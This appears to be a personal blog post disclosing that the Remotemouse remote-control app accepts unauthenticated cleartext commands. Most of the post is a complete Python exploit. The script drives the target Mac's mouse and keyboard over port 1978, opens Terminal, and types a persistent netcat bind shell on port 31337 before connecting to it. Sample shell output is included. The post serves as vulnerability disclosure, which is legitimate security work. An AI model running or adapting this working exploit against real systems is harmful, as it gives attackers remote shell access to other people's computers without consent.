This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.
Unfortunately, when testing I found out that there was no pairing request nor any authentication… I just fired up wireshark to see what was happening and as expected, it’s a very dump cleartext protocol that indicates mouse gestures, clicks, and keyboard events.
I took my editor and went with this little script that connects to my mac, put the mouse on the upper right corner (over the search lense), click it and search for the terminal. Opens it and launches a bindshell.
Remotemouse is binding on all interfaces, ipv4 and ipv6, so if you’re using it and allow direct connections from the outside, you are vulnerable.
#!/usr/bin/python # Remote exploit against remotemouse (www.remotemouse.net) # # Launches a remote shell on macosx leopard # # Aris Adamantiadis
# # aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py # enjoy your shell !! # Connection to 192.168.1.3 31337 port [tcp/*] succeeded! # sh: no job control in this shell # aris@aris-laptop:~$ id # id # uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1), # 401(com.apple.access_screensharing),204(_developer),100(_lpoperator), # 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr), # 61(localaccounts),12(everyone),501(access_bpf) # aris@aris-laptop:~$ exit import time import socket import os right = "mos 6m 9 0" up = "mos 6m 0 -9" diag = "mos 6m 9 -9" fineup = "mos 6m 0 -1" fineright = "mos 6m 1 0" key = "key1 " click = "mos 5R l d" + "mos 5R l u" host = "192.168.1.3" shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit" def keys(v): f="" for i in v: f+= key + i return f s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,1978)) s.send(up * 200 + right * 400 + fineup * 9 + fineright *9) s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) time.sleep(1) s.connect((host,1978)) s.send(click) time.sleep(1) s.send(keys("terminal")) time.sleep(.5) s.send("key3 RTN") time.sleep(.5) s.send(keys(shellcode)) time.sleep(.5) s.send("key3 RTN") time.sleep(.5) s.close() print "enjoy your shell !!" os.system("nc -v " + host + " 31337")